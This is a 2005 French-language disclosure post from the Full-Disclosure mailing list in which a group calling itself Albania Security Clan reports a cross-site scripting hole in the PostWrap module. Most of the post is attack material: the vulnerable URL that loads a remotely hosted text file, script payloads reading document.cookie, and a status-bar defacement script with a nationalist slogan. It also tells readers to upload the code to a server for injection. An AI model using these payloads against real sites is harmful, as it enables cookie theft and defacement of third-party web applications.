[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] XSS VULNERABILITY AT MODULE PostWrap
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] XSS VULNERABILITY AT MODULE PostWrap
- From: "hio hou" <asckbg@xxxxxxxxxxx>
- Date: Tue, 08 Feb 2005 13:54:59 +0000
<html><div style='background-color:'><DIV class=RTE>Bonjour, Albania Security Clan vient de découvrir une vulnebalirité de type XSS dans le module PostWrap le problem est au niveu de /index.php?module=PostWrap&page=http://hostename.com/HACK/asc/ascmd.txt c n'est po une php injection parce que c'est protégé mais on peux injecter des comandes XSS, du javascript regardez plutot:</DIV>
<DIV class=RTE>ceci est un exemple de code qu'on peux injecter,</DIV>
<DIV class=RTE><script>alert("COOKIE and HOSTNAME")</script><BR><script>alert(document.cookie)</script><BR><script>alert(document.hostname)</script><BR><script>alert("Long LIVE Ethnic ALBANIA")</script><BR><SCRIPT language=JavaScript><BR><!--<BR>/* status */</DIV>
<DIV class=RTE> function one()<BR> {window.status = ".-*'^'*-.,_,.-*'^'*-[ - - - - - - ]=[> ALBANIA SECURITY CLAN XXS VULNERABILITY AT MODULE PostWrap <]=[ - - - - - - ]-*'^'*-.,_,.-*'^'*-. ";<BR> setTimeout("two()",60);<BR> }<BR> function two()<BR> {window.status = ".-*'^'*-.,_,.-*'^'*-[ - - - - - - ]=[> ALBANIA SECURITY CLAN XXS VULNERABILITY AT MODULE PostWrap <]=[ - - - - - - ]-*'^'*-.,_,.-*'^'*-. ";<BR> setTimeout("three()",120);<BR> }<BR> function three()<BR> {window.status = ".-*'^'*-.,_,.-*'^'*-[ - - - - - -
]=[> ALBANIA SECURITY CLAN XSS VULNERABILITY AT MODULE PostWrap <]=[ - - - - - - ]-*'^'*-.,_,.-*'^'*-. ";<BR> setTimeout("one()",180);<BR> }<BR> one();<BR>// --><BR></SCRIPT></DIV>
<DIV class=RTE>puis vous mettez ce code source dans un fichier .txt et vous l'uploader sur un site web (server) pour povoire l'injecter.</DIV>
<DIV class=RTE>Meilleurs Salutations d'Albanie.</DIV>
<DIV class=RTE><A href="http://www.albanianhaxorz.org">www.albanianhaxorz.org</A> | irc.gigachat.net #ASC</DIV></div><br clear=all><hr>MSN Actions Solidaires <a href="http://g.msn.com/8HMAFRFR/2734??PS=47575" target="_top">: partez comme volontaire à l'étranger</a> </html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html